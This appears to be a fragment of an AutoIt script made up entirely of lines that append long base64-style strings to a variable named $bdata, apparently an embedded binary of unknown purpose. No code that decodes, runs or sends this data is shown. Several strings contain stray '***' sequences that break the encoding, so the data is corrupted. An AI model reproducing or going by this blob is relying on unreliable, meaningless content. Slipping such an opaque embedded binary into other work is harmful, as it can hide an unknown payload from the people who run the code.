	$bdata &= "7VcIcQDrgxWxggTe8qsBDAMPcoJRV0R6gMunBUoI8QbldW7pnPwMVi3ARZdRHJLz0pNQMKSkX8RggrST6dh57xWUx2dRNVgIwQptBQd8+P8FEARj9eFi7nNHd8AM4UapCEbMbgQVZoS8kcpIvWQlV6NUgOQsiBxqCddIEgHRXaa+tbjxxmabPWGZnLRntVaBqb3P8G4MPO0ulXVYASWklcaHFdPcRphRxtD/DCBdTKZp5JDAj3txND9jfrERgEjUEUMAHzAnEkCRI4Af2CookBLYtYrGAOEeyobYzBp3d5RkALGQmHFGo2hGREAeDIOrc+Bk3IASyTTDpTegCtGRDvWAJB1og7+3YN6UMWFqjLNkiYFRZ/GQPsgf84gQaWLRt3Q3oCh+tSE/ABZ0GsFM54SqRuJd3/AHYp3Nbvmg/EC1dTZaDQRSyjONDNs8I4I0FqLncJDBiBKMfBPyKtLYHiVpGIBmt1mSgiCT6CawMl6HhHZE6+dSC"
	$bdata &= "kDNaqFG5KDssQxK2hSxvvKHAUPIWKDUCtAMV0vUSnhcDS67nrMkhw3n0IJGsP+w+GY1BC6lalwfSjiZ9kDlZCg3wgrxpCKMVzagONSSisX+rfICFYGMB9V+vMZeOYi0QhDyspIQjJMZ7oEwTK/xTYTYJyzRBxgGbhoRm7R+ueC5AihzxYUgFlHIaQXYF6OTlpi9UOCAwQdhs5ORQYNh0gD+Tk5OQkKCww4OTk5DQcODztpM1tV0AkQEQPycnJyUhMUFQkU4nCWL1cOTkpCARscHQsDDk5eHxkkvYcnRsUhIiSSSaZjJCUSSaZZJicoBTfZJKkqPYsXh8D0Q0rCAZ6fNMg4+AwyQQjNIil55N2CDs1OMmXfG1af35cDIE8EEsul3wjQBRE5MEllxhIHBFMuVxyuSBQJFQFeAgsPcjsbFd+EHVYRBCLFVFwddQTFJQFgNJQLyAfi/8RDA4lBnDxChODXlSUjWoGLrCgnPFoBBAP7oWAhaTt"
	$bdata &= "ISgdE+4KPTFOUtrQ0zSNQQpdMgvQZhTKlpSq6tAYAhgRuwQY3yxNzCnUdGBjcF+ritCLwgEkoBa0lH5BHcgUrEEVKn0OWOD4Wkse4fFLJUU14YSYfGbDYEocIUjYG1mwoF4MTH5bgf47iaVikOA2mUlh5JMvx3Q4LQpP6Y4+3HSuMdAZELjvw8VaMrG0XQPRx+oT0s9ffeT+2MUS0GV+UCGSxGB3Vhadu0oae49dzHQd0RxT3nDZckMrKDxgPGgXgI5bmtTdKA7GziUKAEsfQoZbBk77CWGQixRYdCtEvk1Z2lBJLCTgizhbOWkCwmkJA6zkLkr3QegBSm2apUVG7GXAN1PyFrFbtJWEVbUTO94jZKqmtwFD8iCXAcwFXhsFpjQAyV4oVukAZKqvb17QyFFNsb8gRdTJo5VdFSh15eFda5b/bH2c3HhKvYye7gBXa7rSy36fiGVcSGwNXOwWj3jhwBvcGrz2HgN1Kz8ROF3oO02EQQ/Y6"
	$bdata &= "y+1+0BuKgJ1HATr6GBW6hNAQNoKNs6HgGAxfUt+I5ilUCGYCQGXR7gIeSNEQUgqBRA6tvSSYFfC3Y0iGlsDiB4+wgNpBPUOQIZ3kFAIsMQ+bjALZqHAfmxkhatWkFrJR4hqMFn7v9uahko4f+nwhhh8EoA/NXwNNCT+lQAcgDg5dPf+FTSLaNAxKkGSFSmNEyFyDRAKAYFXD2D0JHJrSVX01YRVbEIuyFZXwenoJOAx3b/tz2jXksjmFhI+2Q0pGcDhj4Xw+oCA27gTNu0AXyIAPBgoXH8JOgN6DCQtEiKDeFlSqigmxGn/ZlgEiRjrTEwB5I7hb0IbSMYVweALC8gLfQzjn45MweILhc7wEHUf/f+zZNfZA9LB6x8L0wPJgcf2gKSm3gDWdXThIWAr+KALz2xmWghbOEPAVWcUUMIgHxVQ0BQIYNKChEhONhJGAuFsiD5Lgsmy1Gal2dql+DSL12bQQwg8TLKb0MQDD79KfotyJQ0xuA"
	$bdata &= "UkhBI8UgEWUDqcgGoLuyWEEH+GM+0CekJAgxVHRWAlRxGFKEBnZEIVGBiHQIBCpRQQIaBoLhgcZCmgUAh8TXkHGwigHCHpXagTjq4hvelGV/wxpbL3/yPI96L88PwUZCaFVvwYGxlnnXQLN5XLDzFZGtipX+sd+wQjGjlCdAlfQNvQwFRxb4YNkdhCl83/RkpjAJjogA8xgKibO8VZuxExgCeuGQxATCpcKEAba51Bi4EFhdIgKiHeh4RTs4+LxQ/K2huW/910IEgEPWqogFjJ6loI5qie4hWrRIhFl9ZGGqDZwlsIJAR1yECCDgokGMzRKB5EByzip/og67LCgP9GBIHeJOBt28NQJQrt5euasyrUYRxa4A5yEHpgoSmbZrYyO61CXkVh3EUI7YDU0A5MCJwOtULlNsqBb4ogtN6vfXKLAT8K0IiswX4lEiTaJNx8IErUkwj0p8JCUUicrRJnYloToX8d8ztlciA4XkRfIHQh6IB***D"
	$bdata &= "ooGXr+IVkEQjShEJHGZ2f4CluPSjTwFCgxKxAeduiJPCXIeu6J/yVotpyHIHk8IHshDUCo2Tj2MPDk4X7h+rtiFhrSFdsDCQEHWYMTDQW3h7qEQb+SHV0ahDrFgcuktVBhBJCEesGSRVgB1ICahpRSfxCgbZXwpvJINRRH59HXRCqizrXfhYmg38hKb0gUP7rFSpQ3UYQg+HjMUB8n93JA95QV77ZPVHWUIsIIIIDutWVqBxoAI80xrD+nemDPgi+LDGMh3TjGIILOdD4BF6JhxhkMUxtQqpZYowAU+EEsRWnCfSSuCdYPWlGy2pVPgT5pmmapvr7/P3+QOSLaOIOEBljB9pCftCN2rqmHRCMSJlfVDYXzFvEHPgA6U/7Ijqb0SrRGM1KjLRfWEeD6gUepYZnKNqPdHFKdEUOCWoKYJlmA64DvxnCn/gG58zdetjdXeBR3TDapYADOAYI8IPEaZaTVqOWzH6k0SxosmnIa9u085oEd1lR"
	$bdata &= "ybvtzOzI65lxwGrTT5KJsWffZo41HGbxF7zr1y+m/X/JvMzrhoPpGnROSXQ/BDDYQKuwIBrWEggDtz3yza/ZtOuarOuRbeo7z4PtHuuEGTxnXwK334E0uOrZ6GO1pOuB8k2A8MEY/P/MDA+HmwC8YAjaUMJHqXHroHvk2RDLlxGc646U64XpfMmsMozVF4SA6xBVzcgTV3zrB3jcSt0g/JCGFlHT8FErRBeZOTcYLwQEKoch8zq6PO8dfOH/PCcGMA45QnuezfNLVGffYMkWbuB5z8BsBnV+P4kzUjrb7gZ5VLUUzwPEg3tYAGUTMAgOqbze+bPpLgNuHIC4IOBwIR4tOR3dHA1N4v8/d3RnPQ1g2RKesB0+sg0/mDTzANogWN5YpvZWGNjvZ0qaF9gNioDZyQ+Tk+9eQhygLYSEndgpcM8qC+l18gJLQarbMhFYsxccP6pzKusIE3J+a8BwJgjViNu4ZiACoP8mm+c3EdheRmkE+cqD4"
	$bdata &= "D8kbksDJk7O2PBf2t+aGgbNBtj4FSveu703eyEt3iOqDMLbPCQQ7O6hhMRo/MbucVsyyGw1DAwU2NpLMHuvbc9toY1dJo0nH5AGl9i8n8YfyrZkWhbvPQwUbbGXYovHfe8gwNYuMqUvyOVCjkfKystbcpscyj0MFLbYSzGLx33vEGBrlzKlL+RyIUdHy8vMLblNDss9DFvspZgUi8d97wiwtUsypS9yuZAjR8zMzZbcJgfMPQwt9lLMFIvHfQTY2qXvMqUvuVzIEUfNzc5LbpMDzT0MFnspZhSLx30CbO3S7zKlL1wu5AhHzs7PJbfJgc49DIu9FLMUi8d9rbZ2ae8ypS9d6BrgVzwdJD2lNVT7UImAfz1PJNHeCXQz3+AaON7ZOgHAdzBMbrJw01qeuwzsbygUTqiulRQ1DDnYqA/T0ml1lwwhl91TcsgkCN0IyBGYywDcCA/fcm0lA99n2woGyADb/wMZQI7FxQaQIZB8xcWQIeRAfM"
	$bdata &= "UrmUgGxcUcU8diZ01YKMDBlzpRKFNRvhYRLdccyMKpCZi4TMkF8g5bK4gloPmMJIRw7c6DO00M/wgmXHI7syMuJR1NM0JUZrswLKqFNhcUKkHQu7AvwD+Qa+9esoHjGSvYd14zCu7pIR0PiIwmKEMWpNtpM4vLNoPjB6iBQK2OK8u4fA+k9LYLfBhWEInQHxThcvjgKN3Y66IXnvsas3UINyYcljRfOE00NIw4OCrz1oL/xj928jcR2MMB4AEl49iJXLagzDvZ4Qoo9jRf2ES9AdgCosnc4LyBu5JlDnjkeSMJXlEvVhw+4MRG5U/Q7BtyBjSLdA7Z4OsK7ZygPi/4E1bdcjyOYAJBcx9/AGbPfUvXrJE0PObNb2AVWA4cQ1/ZNCSBhtFWUmb/vBoJ+MIgxppAHFlbfJ+n6TRSMBgz0nYGqY+bH1uTdApOcQIwWsO68O0AcZakJAtydHnPwzmu8efKApokJL08zyAoKCA9vtvcg/YIdxh"
	$bdata &= "OAUGk0xPeJlhybOsgeQB0Q8+QgjccJBEcDYEcQUVvwyQXyRH19aLcwkG6c3UIWYS8c7q7LiCHc7ohCAt1wAcUUmsk8wTy/GpV8AJwDNn8zkpZlN7iuQcOufCl0CPRZqinmeoELSF3VkgsPCRgWC5tlAtq2V1cWARYLsxYghBXDMdBwIekUMh1HZXUUZTYgwb9331Bog5DkAVAUNnuaxrZ1Nxd7UQMN1rBhDvgg6U3CA9uFk5dexAOi03zp5upDvQF/gPg4ASB4UJq6jdKC8FmiUX+HHJQwGsp0rQ4plqJywo4GGsqMjtJJf9EFvHBZySSuPjKI8hmAFUCMBbw6lQHT0B8bBJrrgfWqc9OWHQEGNGGCRWyIwdiVXoHzHR45TURjVm+XA5qY0oPmsoPTVW0ugN4C8eUptMtIRB8KRwU0WXSinYTsJI3sAwBkni73R4ISvaAEHTm+GUO7//DgwmsVAYSND7p69EaGgiJJRrYgIuNQBWGDsHq"
	$bdata &= "8K0ANUisQIHqQHyy4S2yEF1TUloPIUiE4b8hwY3PhfZTV+DdGWn0I9B0UYSfQ8gOJFBIRag5AaDAPtc2wpzEA6ko5iipgQv11J4lfAHwBoA8OD3YUJISCup3xJVaingmnDKO1WHDIdwNyRZoAev0KloIt+9MANABWrLZaRcIeBs2i0gGCuD4XN2GQAAtgev/P9CUwrefEIH7AcASPOQv1kcizCcz27pcheB1g3CjoA0yA3z0EXgrtrZ94AyNCKuriqtYH4H2SwOuVo114CrUhCvwAn4w4gBO9jIkNRYfHwME2J4kc9GBErJGhhHhJlna3lDh4EKNfLRqH2xskr7eK8pA0+AehQeA+W8590SDyv/T4vfShVQHBpyLolAQCamtAoHzhsaZbFkivrmfNrOB5q+iToPO4Ea2CUE8LivOunaNTGb6sTX7izED8oluDDkIciKa6xvdf65YeitLPRGNcgE7Q3KHcQRaOHMXApYicEilQDAyFh550"
	$bdata &= "eIueEMFBlY+IUCbDYo2BX0NVll3K8jzq6QFwE+1AUP64fxusA0KOg37O9lIS6vYaQEfRHx72I8PWUMnA/vwUNRMadCQ4TSlOV7Ri+I+09pQpTEFCBzcUjKZytPnLCDBCwL/KVX899d0XJ10J2CmJKiQExkHb03wPu5SC3AkNTBZeHXw0+ZUIoVD+JJmfFxGUCGIBf6UWsMPDsoq5hKJdJWhC2k1s2SV1OkifefDKBIVYVvk+MwMik61XPSFEyuKY9F1VQITBJJmvposBAJ/FFWNPBY7/iJQadF0+g8IiRjFU2EWZB8eXQCaoktS8lsDZKTiX4Yxi89Ied5E8AOEYIsJiykEQb02oIY14+FGwcefTLBz3zsdavg9UA3HPQ+MreZrgUIMAQQGSWWhuLD1EU8MjRy18Ii4O3yhH4Fl4K4D2LikclVXzubWggs+yJB8jVbPI85TcEYTb+8iC7wpIRAcmur8tl0GJECafdDYBNoPRl2v0+OI7H"
	$bdata &= "hgwJLeACQL2b5EaTuNxl3g+g0A1JI2x+SEBFtl7OLrCiKe0oMgpsIZHkBeEAODgyIVJVPygyIYyAkZeeIUGIG9UJEMFRh8DgXIHIMh4hDKiwKpHOIQFMhzkCSDISQBcoBMHCDF4JJwfANywygpDCo6tBuMKhpGoF0kVxiQDxAFWGSwjPSapmnaXbQEqKSgnLBGDLBulHUfW/5sWR+MieZsVayKAku66abyDAg8CuA32L9mDXUDQuvrszAsfPkLD4cvApPWf2qzifmKyIDpMYDNth41ggbKSutkJAC4W8KLCVk6pCoRK+aWx+EiobU9K15IdA3DX2pob4sazuuugERzlwEsjACAoiDsewH0HuuZp9aBQruIqHapoYqtbyb11fwoPC10JLy5PEMPAJX23448nDxFfhA8YxYwZfA7GYDEBwbrgUpqC8UeD3uyhCCrD4ZSRq01OzCAuZwOZq0Hn8E5AmSF7gDrGgulK7o2GuS0GXMwtCoYSgL"
	$bdata &= "iw4gHxFrBOdpmFlx94o9dPNzudc+Jhe9/dgCQBKR1JrzPmgncTXN09usYstXYhwW5Czt95Ou7ICe4hjP+aNpuouiXH4NSegmNSv6a5wdqCXd5bngtvSAQO2XWaftBCO2DTZgUB1lH6g4CgVt6JeCEC+2win/5LDE8CHa4cCipdqss65Z1IoG9i0ev6IRmep//dMK6sp4yqBqSENwmkIkQ1I5NFBTIUjl4dmEDhCss9wV8VPdPlhoM7DaJIuvSqUsOpXXYrDLWNQofIIW8/QC+/Ka2Bk1eGfp4Kti+SdC+8DzQgflQFFZ/CbZwmyb944a5UR5mgwo78gtQmFugNfEJeA0tM8NQtM5P8IAENnB09EG0Y+kHMqkFoHAGkBZcAIY58n0C00TNzEZOEqCCDhg+au5NpCtFHD3XqO2MPbDrFwpvkdaM+RS+ajiD7l/Bs4xgOKy6tCR9DRjA3Wd+LOSYIjJYelbwOgRmKMQQQJO8EjTe36zBfawk"
	$bdata &= "VIPgB04TGEDqDC5x/cI/sK7Gi9hmgTvOkHKIKjUopjC49XuwQCJwuotWXbgqD7dTHlZUoUDOtmTUiPjTEoOLwnCoAtxZM8EjDNcDgMBUzTYijRBcUGmmMxCMIfoU7033kX///b8Ph+S/P3cNm8jE/SWpVpuCTh9H90XMQwi9IdcVtIbObtp1DwrECWYh8keFVuCX7VEyIUpDCBc5SwS+iQtJYgt1DoxNXcLt0pZNhV6YjXXCqHCTWVAtGEioA8mAFXcJwFqcflWCDcRqXqYk8lTZNqCgVO1YJQQJpuE7CC20r8rqjRwKO9oNKPM0pNmI7YmoJreFXsDkBpt/ww9Og22gAjycg32cAH+7i0ZG+j0eULZNqON/joHHAsDJVMGXGv9+O57c8VYow/Mu2NjU0WXUL/gdhoKL1gP2C/Eu3MHqH4i7IjYLyjdeH/u2MRAqf8oUf00rfUKLo0hJ68/32Rhm9jc7qwLQdKV47KJV2NGtfR23bYrhH"
	$bdata &= "9H02bzB4hLpnk70b2MA5hp10Tl1sHQFZkkFBsysaAzUOFK4CmARSBoq2EwhplAcCnUzYtabpi0oICr21gAS2hvaAGUFB3tY3kbu+t5KNVJN0IYO6hDr9trix8F6ndY89jJzHMEzj0Iu1scM3sYmJG0d0gtayiJ9zgqKT40qtmWKMLtaTwkFBP+8ZcRVAXhBwXpt9gT2EOoYrHx1drU9QcJVynAv4pQEWBiUkQ1afVIYCmqDlFlc5SwCDxAfIrX228uGRot9hAtFjOAPBEfiJH4TPjaJdwKJVwar8zyvawCOAQZVq97meZ5nhSNbb8q1ERt4z4Y0KRbYGeISR2oA1ihwG58h2+XiW4b7iayiPKEZOYhfe3NmDVpwVioiCOhE4wg9pfW7ZshnZnYCdduJ8ADwHtCJn546Ese0RcgH1OvQ3T6hCRtNvA255qNWowl3DJhQUd22YIbmwI70ZAPhDszZxwWlpcWmkKDjg+WkiLiqzNUqaeKLqE"
	$bdata &= "TJBYvSouRuJcd0y74hF9aqbe52KH10YEdZMxFBHS4RtH5AhaLi5JnEAvJEO8EYQCXzzlQidux0CP3NTOJbAHdYwYDc9XQc7o3ciIkBQFZAtxw/AZrKuJDuq9cngQfa/Od5nvbGRdDMBtHS09Sf53me1dbX2Nna+6LUIDbbP1nG4H0xhJTEQwIt6wQKIGBCQQfsMtQyVEHCqG4qLAAKMP5iO74PlbbZrykQDQQgiEpQAwEGgHNazQQwBTGUVcDoDP05hZ7Kz4GVAoau1CiLFL6UTA/3xpL1DukpxOfo61F7auk+HBOB/iZsxDsvr4lNqeCs6jAcLMIJbSvYjcBqFjUQqiiIbG8hANJ9CgXrKlfQDetAaBJRFlCk39iL2WnJEE3a619hE87BcENrwE2NLFAR/4QIDO287MH47Ny/2R+hCWhuZLk499uDXQVY9elgO9guVeqq5iLiGAVyAFr6mJbPCEpeWUjkmAip0+woTiyXYoUEpUmyJsk"
	$bdata &= "6TXDB+wPeJnkwCATZskLQPoxM4E3EchOL8eeBVQQTkkDGJg7DVFuL8Ld5+M6c1No3ws++Icoj1iP+NLgE8Ki40ifJiSTWdD/IKmwXZIMDAh3+4R1hIkk9MPATOKT0FC4Q6DvYojM8/JAsOHKEQPcqgHZTD+0TAuR1DgjghnGvwES46keYPRehbVpVnEhCN3IyIs1RhFDPmHVoGhwAQCCkvO1w4OyYwAX+esADDb8pBBIssH5YjVQVTFUYRhq4qJLsRChomrw8qKxmNkhv+hUigA+v1oNlkFQ0Fzv31panCELykCqLqP8/aJo3wol3SQeDRaissNsAHtCmf7gj/DbtBKQawMAA+H+IBUeouSLPwPjOhPTt00f4ltFl8DT/C/pywe4S0jYwHOEL1gUbNH4o4A/7CEbAf1IpfUiL0PfaEQxvgkTEvAPC9uxL3BHerrh6oW34Nu+h0Suw1rTmEuqgGLyXgBzBG0LPh1DwOam88vBV8IHi+vJF"
	$bdata &= "nkpT8vb2+uh5GuFKQFH69vJDdoRGen9IVRLUHjwTXgzY4iQLwQ7mA2kgexzq6zbATqtH+EDJgcFN4MQh6KOF6Jhr/RAqGfiB6BpHHFP2tj+7PPRInuyUZcZ12hZCi86oNBx/4NMj88nTJJQjhnT4qBk5RrR2QjTzEPMV6Dp+PAYI4DqSjtDQplQmaUdFRUK5PDeV6pTwdRTYCrUAQqDU+I50vY7DgTEYSK2s48OIS1Ics6Ll+PHyVbjluKdqvCofNxfq1otwFjveptq8p/mxRTaJWKEAuPGk+ZCku0BArH+RHBcYDuVUOvh+PKFJvqQyLl3bC9rcj+8Qv2CJXaPJFAjBHELrO/hlOF4pfFgD+J+ofJN8SV3rC9pIj/By0WFC6lCZMfu4weMokazydRqPFIiRDMf2lUfhyPV45nIeXi9qTQOPwGNaaZqn46DSRUVFRXaa56ZF+YlFfeBncKKUjZVqSbgVQ0AUtFIKdDKoueAmtAFNFIYUf"
	$bdata &= "yci9jjw1sWUXMZCAwGbQgIe/IeiA5JCziKMhmoVWWAiEWraWAgIgL/INFLuEGoIge7+Ml6lgHpnW+So5ItN5JFJUm7gwegQngAQNLUSwBBLNlgC3tFl2kx9MvfearcF9Od+PGdtUuBZ+8Szb2bgzuhmTlaw6gr6a+B/pED4jVqyGmCmimS0gOCUyZPUsOP***avxOyW4ArNdpPGANALyj648CwGrB0HfDQJmDRaGyowEizELEfTt1oLyNAL94ICAgBwAmGpSMKnWM1sxnj40kIGpIBu2vB0AeDcvteFJDA71uJQ0HMiA03MepJaZqGoP8x1Psdv5cBzGAP2gMEwms4L8CSFHDDYIP+pQX/R5MZF67ZLkkuKA0s8NfEKh4x9yo5EgDs5wroF3xDGAzBLO6xz8ghKjn+6qnMEQwr+AyrYgCAgh/RGxIhYA8ZSqpY40aqM3XowIlR01o1LePYGcc2MIFT8K4NAwv7KgOINgMKQUJZjUtEBjk"
	$bdata &= "CECMgewMIBQApKU2kfWsgEDgQIAjMIVJoQASDtoVCSLhTwuoa28CMSI8pWvueh6oeII4l0ks5kuJoB3MqAZJ62IRfrDAwIBbRGzrCfDQNYDBYUsu5aLqAot1juC8KtHlRCd2RK5MMawhALZg3IGHUSRau9T/i7xVLDVqm0bOaXEgIIAXPBu2vw98I9v7JZx4vKvkXKc3DBIB87zzDLzhGEkZFgQCDp9rUN/QNfI9GXXltYKahQexPCCugPKoCYxHvB5kDDDUAT0RIyPoGb+VzO8Ie1xD9qEFpvygg0labSDggEEAIgXAZ3qAGfBoHKS7zgDpUgQr9HI8e92hOawU2NIFYME/RH6GkICLYL1esKHRheV17rbwFazXqKDgoQ7t0aHCtwBEkf7/0ZMHRBIwDMtcY+wvzqSFAmcG0csDY/CQ+L2JSdQZfw2VMQbBCRBCmSpxAQhnAmmcDmcxcSLa5gYE+uexD2mIJEwSKDXlRzGQlFHdpyKOu"
	$bdata &= "LgBQDCAOL/mrjB+gesBgz9hBGThEHVl7cS6fyVN7OCBAEBAgCrBw8lRABAWDOi8h7cR403mAVKvp0HA6wuBvOQLDNdRZIGtCicnJwzs678yMLYysEwkBaLcDue7zBuw0WW4pbhFt+pfDBmovXI1z30iPWC9fQXlAlfgdjmK8Gv4cPIitQ7CwSnmZZl4fdkZ8oKDPSWr/nhcf3MBnkgp3KygePLen8K8aiyktODiKYIhh4mg4OxpnO19Y5ORkgf8rKyuNOgnHC/dAz0TROZpN2qB8DwgvSpEnggAI8QP0Vik0Q6zsBwNj2qA7UZ+1PCEP2wRASDMAWCVhjIaAJNBCu9y/oCZygg0gEAiS7dGGfk4TLI0mRBCUZ5PIMCI4IEL9bG+eQxCXB4QT30TPI7We3SDThEDEKJQPJIwi3Bzk50ekEwekDJQJt3MskBSPLIm9rqGIEHsMiRkkMEKggD/KwBBUIqAgEqBBu46DpAqgmBtfyscz0q7mj"
	$bdata &= "wXQ1GyKTFhh8FsF1KYlA6yF8W7etv/j+g8kCnBIdtxNYxv0LlEUg/Iv9nbRLAyB8AiI34+saMxqQuX3nlJeqlUxz6wgvFLALXyAIMwiB4eDmMQh2Qhh4LSCaN30cWduFsGZgIOEWGNl6330fANlYED9gtWBg4dkHKUrBA0mYSCBA47QllWcQWt3dPmDqYLqDYN1r3W3dZUwAX5pTFY1++JBpQvZBCGkmT+WpvP4QCPsE9wItWr8r74RZM9+LQepCaFKYw7r/8MBv3wB0L0h0HgQLSHUogQ6bsixgLxgGJf/7Mu/9Ks8R1R73BDruIRbcEpqGgA7IsNYC2oJ0Fd8aJusq2atCCqANmwkVvZkluAN7gELZQVDZVNqKbBjdDN0foJRXRCCNmM4HhcGhw+Y6hhyNqOFDLLZaBX2WFIRqD1O1EFkT/XjVLPfknYh4FvZsCpJjGXYQagQz+8JB6D0CpzoIcNh1n3Vqy560SI2Bz8jIVDcaYtlWE"
	$bdata &= "oA7MgzcGdFZN/bmB+Hge0zrSCsfLDWBnBzY6zIreh4eFLTbywjQ6w/ZrBlC/iIg0ryoAs2OrpEBoMNv7DogfoKw84Ie3B8owHF3Nw+LkjQMGPUC4mJXd7HCxHDCbbrgvDZePCBW+c5ufQ1xRwPmqHyn+OtUXQ/EByLwY4DTNElHEoA29p1wwUiq5IL2gSEciLiiEDJZkQA2hFDIioL9hMb40W3wGqhoBrimgU3wJRz0zOBkgxsRzrZ8ULZ2igFwplJeXypqEEEp4BvvZfz9lPIXPSURESQgdAtqIIAjIAzv55FKgIPkEx829LeUE34cVBeV2xRBVcMXIVH7zET8m908JA+/ihQS2+IXp4jbIz4y2X38xQuvguEj0ghF/AvBBMz+LYHZbQxMHMAJNhYOatZD4lBQC8jjHEADPEHym9sQYwOZ2OYlpKB8G3AYnnQKIygLIBgeSAl0YvHdENX9utga+tnrMVnhBS1nKXxAUtdYEjaAdFaxSB"
	$bdata &= "omYbFugjR0QEoPrrLgLpqpLoklXySi3DcMv18HtZkKc1AhrdQrhqzhMU0Q1Kr1WmJ1EyEuFLW2nZ/B/2VD7K31DHTNVv07znYaeetqLECgP/aWM4hH9WYUUWmmtpoN95jWNu8MBkABH9KnrRBBs5bqmtamdljDzmlpUeJ9BsD+vGIoQDMpntgERkTJeSJgIk6i1CwV2riqB1hlCbQm8Kl7/6VSya7i0ygoqDufJaPIocbGuU1NXUM26Ej/N0uGFMBmHjaN+Dp4/bxmqFh9ETnApPycBO5Zy8K4gUoA7Ml1oRHSgXrsLvZB6/AZGFnYDAJFjgxXDZjhewHg4IkwiSoE2GVEQNQJ7lgEZZhDGd7wi9C/B9uNPBKNFBsL0dEGPuia82rJC19KQIfAZPd6i9rB0KYPuusibsuL5AP2kpl3a6bXYh47/qxQZkpA6qme++xXCgI0WPQ4gqSwS1h+HZrdB9+O2wZ0BEFezPxVSaCVkPARM3oKLS1"
	$bdata &= "5Garil0KVBCwCQKoBXKhiZ0r3jQzW16Y8V8giFzr6i1BwjggL3kl2IIGJ2GaWSi9wHHo0ETvxLgkCWy5b7IBEaS5URJJPuM/5Au9AMAgUQ3b/YGgAT2BjahMjJ2jojrugDIMmPdCJ3qACoYZU+tRDFwRd9hALz8aBnKG0JiRo+yQ9EIIq1SewRz2HhRQwiwIYPpAdDJ//i85IqvY4hzrsRAvxqddnhcu2MnGzESB00GaEEpOARKEKr6+nwrauAwS4ABXwlYzoR4yjUgGlXcDDGREyjIX1xHTEwGmnc/Mx9CNew/rVMBm/U04LyXRNon7BijLSt0GzWrYgjSrqv24mCuSKB3QnUiPe//ciJwE653IGOuN3AgLmOscSw7AvjH/GOuB1C1zRM8kU6n9TBRq51HIC99mLwdUlwgiuhVrS8MQUUctgawNFJv7xGkyhqVPCOBS4fKL09K5QJFf3GAPImym3GWAZnC3hlWB9EH5BQ98wRiYeCM+9"
	$bdata &= "jZnCdfWzLlUYO9eriR4tvuSWQ4UAbKoDSEDrEsxKSB/gfdQ3pmQ6oggO93z0iw3DJvT5DLi5baHxDiQVIOsmaNbqFPBR0kPYYA4OTRyuAcJsCrDOM+ugVhAgYFiZB3dBwu6PbQJORS/qmzDW6YMavFnGHE10ioMpzjLuopQCcuASQwkS3z7udNeKUOyVknW6DIoLOnxIsXL7WcRAQL7o671aGH44Ye9ThnhAxWvM26iR7+hoiglwCBaeLaqkdCB54evO7HpRH7EEBmoJKQ6gGgvWKgahalRI9P++Cr+c3zB+zH5AL/MFhTosrBuI2UIONQWFwCJRxkFIM+A4bWjiRaqsqMoRZwh4gUxTzyB+6YhMtOGzmRcYI+i/5BsKe35CZhiTa/82/Y3kkPyF/3RahcCgO2z7UDFTV73vdBcl1KkU0MIgN8rVFD40V4XgPIA9tIsiWbmOZH0IDHIKZAV9HBwAY8OYT2ATYrWwuv1O0nRQLNynwrPSE"
	$bdata &= "NxW9KMhB47HSLokz+w0SpRBGORpkIDK+P+HSCDW6QWjm0DWjWLZFWSJcxycEq1hZLMOX1drwcgSqW4K+SzGaU5eICDLK/mZLDui7YPEGEqegwq7VdMuORRyp6unq9bwWJpCS2hIEKHCFbqsFXBSwc4hAs+K5z/ULqvCVegtUsdRvaqwQlH30xPIZKSNkXGFChxQ1f1oUW5h/MPoNFA+B5YcbrvJWBAX2I4rBWMhsEbhXsH4msMdwLcIeD/4i1KRISsAArQOCQ8Mo0KWQEj3U6S0EdBWQJmNMlR4R7L+CfeZCiIk39tjNokG1vB7AUgsA1ne6yEG80APBKUdFJSEsYVXXOOgWwAjbHUN9CmC814UPdjAF0U5AuFJxpY4QrrotAz+PjPJOFgBoXfqOzSpUDCJvPji+Ld4cB9Kp/ujM55gcSQ5HQ1Hehm1HHRKy2gGBm7Yy1D4A4ILUQXQjuzfKsOJdN6JGH+WIIV5YjXQdMMBklAJ3FPsdL"
	$bdata &= "SUK8oqA059dqeuaL2R0nxSJk6NNL4FJcVLgcxZyu1k/bCDGH66qffZ2trO3h3sR064XHXwRTyX3SU/c2reGr8HN1A7S4JV605Vs2APCoC+JhlwkVDfPNfhmke0Mz1vUCgM4KpCs1B4d7QPMKpFa2kUghH4MCEiMrYZUG50OMtNeOwM4ZISznva023AUN10XFYvKMRtYFeTAtJbwDK0VoDBgAzEnEcaz5YqUedWggWIpDKag11poPElnsVhJ1xIJyrKlf8/2IdTGIwyqPQrdwEJd38ohMALl5WVy7y4ATwF6OypgjAu5F+WTiFb3+50IgHchHwCUQhQxgYPvrF0F0tIp4tOyvoZALchMF5IBI0OXzALJQQdfFwBnRKpJKiJnX5A2kQjM8xlqYuEn/2fGFJySkIswgO0dgNkVgiLxHmwySsEJEYVPB9/AsCAELlBWCIVI1X1kgAFTkYoIaKhp1CJgvjpdh+KJoTJjfYVa/aaaAC0yMlAtND"
	$bdata &= "4LWg8PRDThItRgMCRqIkEopekBcMEApEKhVmdQCAST3UOu3dQpxBsCgWsUHMNq+vusYWHUN7moTQKJPF14BZ7VmoYBDAITAnEEL5Bvi18kFHJhJtADj2S6x6jAkoAixtsRQlgaHIjIOQQgaENID6T7xGDOCw4YGEvs6QcAB2syLZxOg0VClBiirAjSWYslWBeCkTNDR0WYTZw7EF1rLt7YmoDAWiM/gVLeIeye6MGF8uEQvsolt8QbLbRA0zVRPE/RsGD+A7uWH4kfiFTjV4gAPjGFtkFrVMPt93+LHhFTZhHOz585FshkKWutCA5NrtLTEqDgEgL80eCOOQYMPVNNmmz8/FgGEYY6UdFu3OHKpd6VhAs0724SGgWE8IKxgUyQAGZySDcsHc1mAeS3i50dfS4jGiIK0EW+aNOTxup3mKePMYSdZhdKJUuKgZL3y+Q433wRObkBXIa6xQaAXV0S8KfEgR3CHWW6JSgBs98AZwwXDy1sRgM"
